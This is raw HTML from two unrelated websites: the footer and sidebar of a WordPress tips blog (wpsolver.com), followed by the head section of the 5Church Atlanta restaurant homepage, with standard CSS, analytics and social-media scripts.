Pro Bloggers</a> </li> <li class="cat-item cat-item-224"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-real-estate-pros/">Themes for Real Estate Pros</a> </li> <li class="cat-item cat-item-4"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-video-bloggers/">Themes For Video Bloggers</a> </li> <li class="cat-item cat-item-248"><a href="https://www.wpsolver.com/category/wordpress-themes/wordpress-themes-for-artists/">Wordpress Themes for Artists</a> </li> </ul> </li> <li class="cat-item cat-item-65"><a href="https://www.wpsolver.com/category/wordpress-tips/">Wordpress Tips</a> <ul class='children'> <li class="cat-item cat-item-681"><a href="https://www.wpsolver.com/category/wordpress-tips/analytics-statistics/">Analytics &amp; Statistics</a> </li> <li class="cat-item cat-item-716"><a href="https://www.wpsolver.com/category/wordpress-tips/performance-wordpress-tips/">Performance</a> </li> <li class="cat-item cat-item-807"><a href="https://www.wpsolver.com/category/wordpress-tips/reverse-engineering/">Reverse Engineering</a> </li> <li class="cat-item cat-item-26"><a href="https://www.wpsolver.com/category/wordpress-tips/rss-tips/">RSS Tips</a> </li> <li class="cat-item cat-item-165"><a href="https://www.wpsolver.com/category/wordpress-tips/social-media/">Social Media</a> </li> <li class="cat-item cat-item-689"><a href="https://www.wpsolver.com/category/wordpress-tips/wordpress-errors/">WordPress Errors</a> </li> <li class="cat-item cat-item-305"><a href="https://www.wpsolver.com/category/wordpress-tips/wordpress-seo/">Wordpress SEO</a> </li> <li class="cat-item cat-item-25"><a href="https://www.wpsolver.com/category/wordpress-tips/wordpress-strategies/">Wordpress Strategies</a> </li> </ul> </li> <li class="cat-item cat-item-12"><a href="https://www.wpsolver.com/category/wordpress-programming/">WP Programming</a> <ul class='children'> <li class="cat-item cat-item-28"><a href="https://www.wpsolver.com/category/wordpress-programming/wordpress-books/">Wordpress Books</a> </li> <li class="cat-item cat-item-46"><a href="https://www.wpsolver.com/category/wordpress-programming/wordpress-hacks/">Wordpress Hacks</a> </li> <li class="cat-item cat-item-39"><a href="https://www.wpsolver.com/category/wordpress-programming/wordpress-training/">Wordpress Training</a> </li> </ul> </li> <li class="cat-item cat-item-21"><a href="https://www.wpsolver.com/category/wordpress-solutions/">WP Solutions</a> <ul class='children'> <li class="cat-item cat-item-22"><a href="https://www.wpsolver.com/category/wordpress-solutions/automated-blogging/">Automated Blogging</a> </li> <li class="cat-item cat-item-271"><a href="https://www.wpsolver.com/category/wordpress-solutions/desktop-blogging-tools/">Desktop Blogging Tools</a> </li> <li class="cat-item cat-item-298"><a href="https://www.wpsolver.com/category/wordpress-solutions/e-shop-solutions/">e-Shop Solutions</a> </li> <li class="cat-item cat-item-32"><a href="https://www.wpsolver.com/category/wordpress-solutions/future-dating-wordpress-solutions/">Future Dating</a> </li> <li class="cat-item cat-item-244"><a href="https://www.wpsolver.com/category/wordpress-solutions/iphone-apps-wordpress-solutions/">iPhone Apps</a> </li> <li class="cat-item cat-item-33"><a href="https://www.wpsolver.com/category/wordpress-solutions/multi-blogging-management/">Multi Blogging Management</a> </li> <li class="cat-item cat-item-42"><a href="https://www.wpsolver.com/category/wordpress-solutions/site-logo/">Site Logo</a> </li> <li class="cat-item cat-item-278"><a href="https://www.wpsolver.com/category/wordpress-solutions/theme-bundles/">Theme Bundles</a> </li> <li class="cat-item cat-item-267"><a href="https://www.wpsolver.com/category/wordpress-solutions/web-hosting/">Web Hosting</a> </li> <li class="cat-item cat-item-36"><a href="https://www.wpsolver.com/category/wordpress-solutions/wordpress-analytics/">Wordpress Analytics</a> </li> <li class="cat-item cat-item-339"><a href="https://www.wpsolver.com/category/wordpress-solutions/wordpress-backup/">Wordpress Backup</a> </li> <li class="cat-item cat-item-436"><a href="https://www.wpsolver.com/category/wordpress-solutions/wordpress-for-ipad/">Wordpress for iPad</a> </li> </ul> </li> <li class="cat-item cat-item-1"><a href="https://www.wpsolver.com/category/uncategorized/">WP Stuff</a> <ul class='children'> <li class="cat-item cat-item-281"><a href="https://www.wpsolver.com/category/uncategorized/gadgets/">Gadgets</a> </li> <li class="cat-item cat-item-546"><a href="https://www.wpsolver.com/category/uncategorized/infographics/">Infographics</a> </li> <li class="cat-item cat-item-219"><a href="https://www.wpsolver.com/category/uncategorized/wordpress-coupons/">Wordpress Coupons</a> </li> <li class="cat-item cat-item-116"><a href="https://www.wpsolver.com/category/uncategorized/wordpress-etiquette/">Wordpress etiquette</a> </li> <li class="cat-item cat-item-34"><a href="https://www.wpsolver.com/category/uncategorized/wordpress-news/">Wordpress News</a> </li> <li class="cat-item cat-item-13"><a href="https://www.wpsolver.com/category/uncategorized/wordpress-updates/">Wordpress Updates</a> </li> <li class="cat-item cat-item-204"><a href="https://www.wpsolver.com/category/uncategorized/wp-giveaways/">WP Giveaways</a> </li> </ul> </li> </ul> </li> </ul> </div> </div> </div> </div> </div> <div id="widget_footer_area" class="full_width"> <div class="page"> <div class="col Footer1"> <ul class="footer_list"> <li id="text-391430667" class="widget widget_text"><h3>Plugins</h3> <div class="textwidget"><center><a href="https://www.wpsolver.com/best-wordpress-plugins-for-genesis/" width="240" height="65"> <img src="https://www.wpsolver.com/wp-content/uploads/2012/04/genesis.png" border="0" width="240" height="65"/></a><a target="_blank" href="https://www.wpsolver.com/woocommerce-plugins-for-wordpress/" rel="noopener noreferrer"><img src="https://www.wpsolver.com/wp-content/uploads/2012/04/woothemes.png" border="0" width="240" height="65"/></a> <a href="https://www.wpsolver.com/plugins-for-thesis-for-wordpress/"> <img src="https://www.wpsolver.com/wp-content/uploads/2012/04/thesis.png" border="0" width="240" height="65" /></a><a target="_blank" href="https://www.wpsolver.com/headway-plugins-for-wordpress/" rel="noopener noreferrer"><img src="https://www.wpsolver.com/wp-content/uploads/2012/04/headway.png" width="240" height="65" border="0"/></a> </center></div> </li> </ul> </div> <div class="col Footer2"> <ul class="footer_list"> <li id="thesis-killer-recent-entries-3" class="widget widget_killer_recent_entries"><h3>Top WordPress Themes</h3><ul><li><a href="https://www.wpsolver.com/wordpress-questions-answers-themes/" title="Click to read 7 WordPress Themes for Questions &amp; Answers Sites" rel="bookmark">7 WordPress Themes for Questions &amp; Answers Sites</a></li><li><a href="https://www.wpsolver.com/patistry-cake-bakery-theme/" title="Click to read Patistry: Premium Cake &amp; Bakery Shop Theme" rel="bookmark">Patistry: Premium Cake &amp; Bakery Shop Theme</a></li><li><a href="https://www.wpsolver.com/wordpress-themes-for-podcasters/" title="Click to read 15+ Attractive Podcasting WordPress Themes" rel="bookmark">15+ Attractive Podcasting WordPress Themes</a></li></ul></li> <li id="thesis-killer-recent-entries-2" class="widget widget_killer_recent_entries"><h3>WordPress Security Tips</h3><ul><li><a href="https://www.wpsolver.com/vulnerability-alerts-wordpress/" title="Click to read Vulnerability Alerts: Scan WordPress for Vulnerabilities" rel="bookmark">Vulnerability Alerts: Scan WordPress for Vulnerabilities</a></li><li><a href="https://www.wpsolver.com/cloudguard-restrict-access/" title="Click to read CloudGuard: Restrict Access to WP Login Page By Country" rel="bookmark">CloudGuard: Restrict Access to WP Login Page By Country</a></li><li><a href="https://www.wpsolver.com/plugins-for-encryption/" title="Click to read 6 WordPress Plugins for Encryption" rel="bookmark">6 WordPress Plugins for Encryption</a></li></ul></li> <li id="thesis-killer-recent-entries-6" class="widget widget_killer_recent_entries"><h3>WordPress for Business</h3><ul><li><a href="https://www.wpsolver.com/bolden-podcast-network-theme/" title="Click to read Bolden: WordPress Theme for Podcast Networks" rel="bookmark">Bolden: WordPress Theme for Podcast Networks</a></li><li><a href="https://www.wpsolver.com/invested-wordpress-theme/" title="Click to read Invested: WordPress Theme for Investment &amp; Venture Capital Firms" rel="bookmark">Invested: WordPress Theme for Investment &amp; Venture Capital Firms</a></li><li><a href="https://www.wpsolver.com/best-real-estate-wp-themes/" title="Click to read 50+ Best Real Estate Themes for WordPress" rel="bookmark">50+ Best Real Estate Themes for WordPress</a></li></ul></li> </ul> </div> <div class="col Footer3"> <ul class="footer_list"> <li id="arpw-widget-4" class="widget arpw-widget-random"><h3>Top WP Plugins</h3><div class="arpw-random-post "><ul class="arpw-ul"><li class="arpw-li arpw-clearfix"><a class="arpw-title" href="https://www.wpsolver.com/woocommerce-shop-customizers/" rel="bookmark">5 Must See WooCommerce Shop Customizers</a></li><li class="arpw-li arpw-clearfix"><a class="arpw-title" href="https://www.wpsolver.com/3-post-duplicators-wordpress/" rel="bookmark">3 Post Duplicators for WordPress</a></li><li class="arpw-li arpw-clearfix"><a class="arpw-title" href="https://www.wpsolver.com/best-wordpress-demo-managers/" rel="bookmark">7 Handy WordPress Demo Managers for Developers</a></li><li class="arpw-li arpw-clearfix"><a class="arpw-title" href="https://www.wpsolver.com/recurring-donation-plugins/" rel="bookmark">4 Recurring Donation Plugins for WP</a></li><li class="arpw-li arpw-clearfix"><a class="arpw-title" href="https://www.wpsolver.com/3-bmi-calculators-wordpress/" rel="bookmark">3 BMI Calculators for WordPress</a></li></ul></div><!-- Generated by https://wordpress.org/plugins/advanced-random-posts-widget/ --></li> <li id="thesis-killer-recent-entries-5" class="widget widget_killer_recent_entries"><h3>How To Backup WordPress</h3><ul><li><a href="https://www.wpsolver.com/schedule-wordpress-backups-with-infinitewp/" title="Click to read How to Schedule WordPress Backups with InfiniteWP" rel="bookmark">How to Schedule WordPress Backups with InfiniteWP</a></li><li><a href="https://www.wpsolver.com/google-drive-backup-plugins-for-wordpress/" title="Click to read 3 Google Drive Backup Plugins for WordPress" rel="bookmark">3 Google Drive Backup Plugins for WordPress</a></li><li><a href="https://www.wpsolver.com/dropbox-backup-plugins-for-wordpress/" title="Click to read 5 Dropbox Backup Plugins for WordPress" rel="bookmark">5 Dropbox Backup Plugins for WordPress</a></li></ul></li> <li id="text-391430672" class="widget widget_text"> <div class="textwidget"><p><script id="_wau___">var _wau = _wau || []; _wau.push(["small", "re1grds1c7", "___"]);</script><script async src="//waust.at/s.js"></script></p> </div> </li> </ul> </div> <div class="clearall"></div> </div> </div> <div id="footer_area" class="full_width"> <div class="page"> <div id="footer"> <p class="footer_copy"> Copyright 2017 - <a href="https://www.wpsolver.com">WP Solver</a> : WP Jedi-   Covering Killer WordPress tips, plugins and themes </p> <!-- Powered by WPtouch Pro: 4.3.34 --><script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://www.wpsolver.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'93459419',post:'0',tz:'-5',srv:'www.wpsolver.com'} ]); _stq.push([ 'clickTrackerInit', '93459419', '0' ]); </script> </div> </div> </div> <!--[if lte IE 8]> <div id="ie_clear"></div> <![endif]--> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=435748109815795"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Page Caching using apc Database Caching using apc Served from: www.wpsolver.com @ 2019-05-16 11:31:54 by W3 Total Cache -->
0
<!DOCTYPE html> <!--[if lt IE 7]> <html class="lt-ie9 lt-ie8 lt-ie7" lang="en-US" itemscope itemtype="http://schema.org/WebPage"> <![endif]--> <!--[if IE 7]> <html class="lt-ie9 lt-ie8" lang="en-US" itemscope itemtype="http://schema.org/WebPage"> <![endif]--> <!--[if IE 8]> <html class="lt-ie9" lang="en-US" itemscope itemtype="http://schema.org/WebPage"> <![endif]--> <!--[if IE 9]> <html class="ie9" lang="en-US" itemscope itemtype="http://schema.org/WebPage"> <![endif]--> <!--[if gt IE 9]><!--> <html lang="en-US" itemscope itemtype="http://schema.org/WebPage"> <!--<![endif]--> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="HandheldFriendly" content="True"> <meta name="apple-touch-fullscreen" content="yes"/> <meta name="MobileOptimized" content="320"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>5Church Atlanta | 5Church Atlanta</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="http://5churchatlanta.com/xmlrpc.php"> <link href='http://fonts.googleapis.com/css?family=Raleway:400,700' rel='stylesheet' type='text/css'> <link href="//cdn.rawgit.com/noelboss/featherlight/1.3.2/release/featherlight.min.css" type="text/css" rel="stylesheet" title="Featherlight Styles" /> <![if IE]> <script type='text/javascript'> if(/*@cc_on!@*/false) var isIe = 1; </script> <![endif]> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="5Church Atlanta &raquo; Feed" href="http://5churchatlanta.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="5Church Atlanta &raquo; Comments Feed" href="http://5churchatlanta.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/5churchatlanta.com\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='google-webfonts-css' href='http://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C700%2C900%7CCabin%3A400%2C700%2C400italic%2C700italic%7CHerr+Von+Muellerhoff' type='text/css' media='all' /> <link rel='stylesheet' id='wpgrade-main-style-css' href='http://5churchatlanta.com/wp-content/themes/rosa/assets/css/style.css' type='text/css' media='all' /> <style id='wpgrade-main-style-inline-css' type='text/css'> a, a:hover, .nav--main a:hover, .headline__secondary, .separator--line-flower, .tabs__nav a.current, .tabs__nav a:hover, .btn.btn--text, .btn--text.comments_add-comment, .comments_add-comment.read-more-button, .form-submit .btn--text#comment-submit, .form-submit #comment-submit.read-more-button, .btn--text.wpcf7-form-control.wpcf7-submit, .wpcf7-form-control.wpcf7-submit.read-more-button, .btn--text.otreservations-submit, .otreservations-submit.read-more-button, .widget_tag_cloud a.btn--text, .widget_tag_cloud a.read-more-button, .btn.read-more-button, a:hover > .pixcode--icon, .widget a:hover, blockquote, .meta-list a.btn:hover, .meta-list a.comments_add-comment:hover, .meta-list .form-submit a#comment-submit:hover, .form-submit .meta-list a#comment-submit:hover, .meta-list a.wpcf7-form-control.wpcf7-submit:hover, .meta-list a.otreservations-submit:hover, .meta-list .widget_tag_cloud a:hover, .widget_tag_cloud .meta-list a:hover, .btn.btn--text:hover, .article__content a:not([class]), .article__content a:hover:not([class]):hover, .article__header .article__headline .headline__description .star, .read-more-button, .read-more-button:hover, .shop-categories a.active, body.woocommerce ul.products li.product .product__button, body.woocommerce ul.products li.product .added_to_cart, body.woocommerce ul.products li.product a.added_to_cart, body.woocommerce ul.products li.product .price ins, .single-product .entry-summary .price span, body.woocommerce .star-rating span:before, .comment-reply-link { color: #c59d5f; } .btn--primary, .shop-menu-item .shop-items-number, .comments_add-comment, .form-submit #comment-submit, .btn:hover, .wpcf7-form-control.wpcf7-submit:hover, .pagination li a:hover, form.shipping_calculator button.button:hover, .otreservations-submit:hover, .pixcode--icon.square:hover, .pixcode--icon.circle:hover, .sidebar--footer__accent, .copyright-area.copyright-area__accent, .menu-list__item-highlight-title { background-color: #c59d5f; } body.woocommerce button.button.alt:hover, body.woocommerce-page #respond input#submit:hover, body.woocommerce div.woocommerce-message .button:hover, td.actions input.button:hover, body.woocommerce-page input.button:hover, body.woocommerce-page input.button.alt:hover, a:hover > .pixcode--icon.circle, a:hover > .pixcode--icon.square { background: #c59d5f; } .tabs__nav a.current, .tabs__nav a:hover, .btn.btn--text, .btn--text.comments_add-comment, .comments_add-comment.read-more-button, .form-submit .btn--text#comment-submit, .form-submit #comment-submit.read-more-button, .btn--text.wpcf7-form-control.wpcf7-submit, .wpcf7-form-control.wpcf7-submit.read-more-button, .btn--text.otreservations-submit, .otreservations-submit, .read-more-button, .widget_tag_cloud a.btn--text, .widget_tag_cloud a.read-more-button, .btn.read-more-button, blockquote, .article__content a:not([class]), .shop-categories a.active, body.woocommerce ul.products li.product .product__button, body.woocommerce ul.products li.product .added_to_cart, .menu-list__item-highlight-wrapper:before { border-color: #c59d5f; } select:focus, textarea:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus, input[type="week"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus, .form-control:focus { outline-color: #c59d5f; } .copyright-area.copyright-area__accent svg path { fill: #c59d5f; } body, .up-link { color: #515150; } .up-link:before { border-color: #515150; } h1, h2, h3, h4, h5, h6, h1 a, h2 a, h3 a, h4 a, h5 a, h6 a, .article-archive .article__title a, .article-archive .article__title a:hover { color: #262526; } .article__header .article__headline .headline__primary, .article__header .article__headline .headline__description * { color: #ffffff; } .site-header, .site-header.headroom--not-top, .sub-menu, .headroom--not-top .sub-menu { background-color: #ffffff; } .page .article__content, .up-link, html, .menu-list__item-title .item_title, .menu-list__item-price, .desc__content { background-color: #ffffff; } .headline__secondary { margin-bottom: -38px; } .headline__secondary .first-letter { top: 9px; } .navigation a { font-size: 13px; } .navigation a { letter-spacing: 1px; } .nav--main > .menu-item > a { text-transform: uppercase; } .nav--main > .menu-item > a { text-decoration: none; } body { font-size: 16px; } body { line-height: 1.7; } .container, .search__container, .site-header__container, .header--sticky .site-header__container { max-width: 1250px; } @media only screen and (min-width: 900px) { .page .type-page .article__content { padding-top: 78px; } } @media only screen and (min-width: 900px) { .page .type-page .article__content { padding-bottom: 78px; } } @media only screen and (min-width: 900px) { .sidebar--main { width: 300px; } } @media only screen and (min-width: 900px) { .page-content.has-sidebar:after { right: 300px; } } @media only screen and (min-width: 900px) { .page-content.has-sidebar .page-content__wrapper { margin-right: 300px; } .page-content.has-sidebar { margin-right: -300px; } } .site-title--image img { max-height: 90px; } @media screen and (min-width: 900px) { .site-header { padding-top: px; } } @media screen and (min-width: 900px) { .site-header { padding-bottom: px; } } @media screen and (min-width: 900px) { #page { margin-top: px; } } @media screen and (min-width: 900px) { #page { top: px; } } @media screen and (min-width: 900px) { .nav--main > .menu-item > a { padding-left: 24px; } } @media screen and (min-width: 900px) { .nav--main > .menu-item > a { padding-right: 24px; } } @media screen and (min-width: 900px) { body { border-width: 12px; } } @media screen and (min-width: 900px) { .site-header { border-top-width: 12px; } } @media screen and (min-width: 900px) { .site-header { border-left-width: 12px; } } @media screen and (min-width: 900px) { .site-header { border-right-width: 12px; } } @media screen and (min-width: 900px) { .site-footer { border-bottom-width: 12px; } } @media screen and (min-width: 900px) { .navigator, .covers { margin-right: 12px; } } @media screen and (min-width: 900px) { .covers { margin-left: 12px; } } /* Titles classes here */ h1, h2, h3, h4, h5, h6, hgroup, h1 a, h2 a, h3 a, h4 a, h5 a, h6 a, blockquote, .tabs__nav, .popular-posts__time, .pagination li a, .pagination li span{ font-family: Source Sans Pro; } /* Subtitles classes here */ .headline__secondary { font-family: Herr Von Muellerhoff; } /* Nav classes here */ .navigation a { font-family: Cabin; } /* Body classes here */ html, .wp-caption-text, .small-link, .post-nav-link__label, .author__social-link, .comment__links, .score__desc { font-family: Cabin; } .site-footer.border-waves:before, .border-waves-top.border-waves-top--dark:before { background-image: url("data:image/svg+xml;utf8,<svg version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x='0px' y='0px' viewBox='0 0 19 14' width='19' height='14' enable-background='new 0 0 19 14' xml:space='preserve' preserveAspectRatio='none slice'><g><path fill='#121212' d='M0,0c4,0,6.5,5.9,9.5,5.9S15,0,19,0v7H0V0z'/><path fill='#121212' d='M19,14c-4,0-6.5-5.9-9.5-5.9S4,14,0,14l0-7h19V14z'/></g></svg>"); } div.pixcode.pixcode--grid.grid.menu-grid img[width], img[height] { max-width: 100%; height: 100%; } </style> <link rel='stylesheet' id='contact-form-7-css' href='http://5churchatlanta.com/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' /> <link rel='stylesheet' id='pixlikes-plugin-styles-css' href='http://5churchatlanta.com/wp-content/plugins/pixlikes/css/public.css' type='text/css' media='all' /> <style id='pixlikes-plugin-styles-inline-css' type='text/css'> .animate i:after {-webkit-transition: all 1000ms;-moz-transition: all 1000ms;-o-transition: all 1000ms;transition: all 1000ms; } </style> <link rel='stylesheet' id='parent-style-css' href='http://5churchatlanta.com/wp-content/themes/rosa/assets/css/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='fonts-css' href='http://5churchatlanta.com/wp-content/themes/rosa-child/css/fonts.css' type='text/css' media='all' /> <link rel='stylesheet' id='main-css' href='http://5churchatlanta.com/wp-content/themes/rosa-child/css/main.css' type='text/css' media='all' /> <link rel='stylesheet' id='pages-css' href='http://5churchatlanta.com/wp-content/themes/rosa-child/css/pages.css' type='text/css' media='all' /> <link rel='stylesheet' id='shame-css' href='http://5churchatlanta.com/wp-content/themes/rosa-child/css/shame.css' type='text/css' media='all' /> <link rel='stylesheet' id='hint-css' href='http://5churchatlanta.com/wp-content/themes/rosa-child/css/hint.css' type='text/css' media='all' /> <link rel='stylesheet' id='popup-maker-site-css' href='http://5churchatlanta.com/wp-content/uploads/pum/pum-site-styles.css?generated=1542319267' type='text/css' media='all' /> <script type='text/javascript' src='http://5churchatlanta.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/themes/rosa/assets/js/vendor/modernizr.min.js'></script> <script type='text/javascript' src='http://5churchatlanta.com/wp-content/plugins/wp-retina-2x/js/picturefill.min.js'></script> <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/webfont/1.5.3/webfont.js'></script> <link rel='https://api.w.org/' href='http://5churchatlanta.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://5churchatlanta.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://5churchatlanta.com/wp-includes/wlwmanifest.xml" /> <link rel="canonical" href="http://5churchatlanta.com/" /> <link rel='shortlink' href='http://5churchatlanta.com/' /> <link rel="alternate" type="application/json+oembed" href="http://5churchatlanta.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2F5churchatlanta.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://5churchatlanta.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2F5churchatlanta.com%2F&#038;format=xml" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-85619499-1', 'auto'); ga('send', 'pageview'); </script><link rel='icon' href="http://staging.5churchatlanta.com/wp-content/uploads/2015/07/favicon-small.png" > <link rel="apple-touch-icon" href="http://staging.5churchatlanta.com/wp-content/uploads/2015/07/favicon-ios.png" > <meta name="msapplication-TileColor" content="#f01d4f"> <meta name="msapplication-TileImage" content="http://staging.5churchatlanta.com/wp-content/uploads/2015/07/favicon-metro.png" > <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <meta name="description" content="5Church Atlanta"/> <link rel="canonical" href="http://5churchatlanta.com/"/> <!-- facebook open graph stuff --> <meta property="og:site_name" content="5Church Atlanta"/> <meta property="og:url" content="http://5churchatlanta.com/"/> <meta property="og:title" content="5Church Atlanta | 5Church Atlanta"/> <meta property="og:type" content="article"/> <meta property="og:description" content="&nbsp;"/> <meta property="article:published_time" content="2014-05-30 08:42"> <meta property="article:modified_time" content="2017-03-24 19:18"> <meta property="article:section" content=""> <meta property="og:image" content="http://5churchatlanta.com/wp-content/uploads/2015/07/5churchcharlestonhorz-full-trans.png"/> <!-- end facebook open graph --><!-- google+ tags --> <meta itemprop="name" content="Home (Production)"> <meta itemprop="description" content="&nbsp;"> <meta itemprop="image" content="http://5churchatlanta.com/wp-content/uploads/2015/07/5churchcharlestonhorz-full-trans.png"> <!-- end google+ tags --> <!-- twitter card tags --> <meta name="twitter:card" content="summary"> <meta name="twitter:url" content="http://5churchatlanta.com/"> <meta name="twitter:domain" content="5churchatlanta.com"> <meta name="twitter:title" content="Home (Production)"> <meta name="twitter:description" content="&nbsp;"> <meta name="twitter:image:src" content="http://5churchatlanta.com/wp-content/uploads/2015/07/5churchcharlestonhorz-full-trans.png"> <!-- end twitter card tags --> <script type="text/javascript"> WebFont.load({google: {families: ['Source+Sans+Pro', 'Herr+Von+Muellerhoff', 'Cabin:400,500,600,700,400italic,500italic,600italic,700italic']}}); </script> <!-- BEGIN ExactMetrics v5.3.5 Universal Analytics - https://exactmetrics.com/ --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-98640515-2', 'auto'); ga('send', 'pageview'); </script> <!-- END ExactMetrics Universal Analytics --> <style type="text/css" id="wp-custom-css"> .homepage #post-206-title .headline__primary { color: #fff; } .input { align-items: flex-start; text-align: center; cursor: default; color: #ffffff; background-color: #000000!important; } </style> <script type="text/javascript"> ;(function($){ })(jQuery); </script> </head> <body class="home page-template-default page page-id-205 page-parent page-child parent-pageid-980 header--sticky nav-scroll-hide header--transparent desktop atlanta homepage" data-smoothscrolling data-color="#c59d5f" > <!--[if lt IE 7]> <p class="chromeframe">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> or <a href="http://www.google.com/chromeframe/?redirect=true">activate Google Chrome Frame</a> to improve your experience.</p> <![endif]--> <div id="page" class="page"> <div class="site-header header--inversed js-header"> <div class="container-wider"> <div class="flexbox"> <div class="flexbox__item"> <a href="#" class="js-nav-trigger nav-trigger"><i class="icon-reorder"></i></a> </div> <div class="flexbox__item branding-container"> <div class="site-header__branding"> <h1 class="site-title site-title--image"> <a class="site-logo site-logo--image site-logo--image-2x" href="http://5churchatlanta.com" title="5Church Atlanta" rel="home"> <!--<img class="site-logo-img--light" src="http://staging.5churchatlanta.com/wp-content/uploads/2015/11/5church-charleston-horizontal-oversized-white.png" data-logo2x="http://staging.5churchatlanta.com/wp-content/uploads/2016/01/5church-charleston-horizontal-oversized-white.png" rel="logo" alt="5Church Atlanta"/>--> <img class="site-logo-img--dark" src="http://staging.5churchatlanta.com/wp-content/uploads/2015/11/5church-charleston-horizontal-oversized-black.png" data-logo2x="http://staging.5churchatlanta.com/wp-content/uploads/2016/01/5church-charleston-horizontal-oversized-black.png" 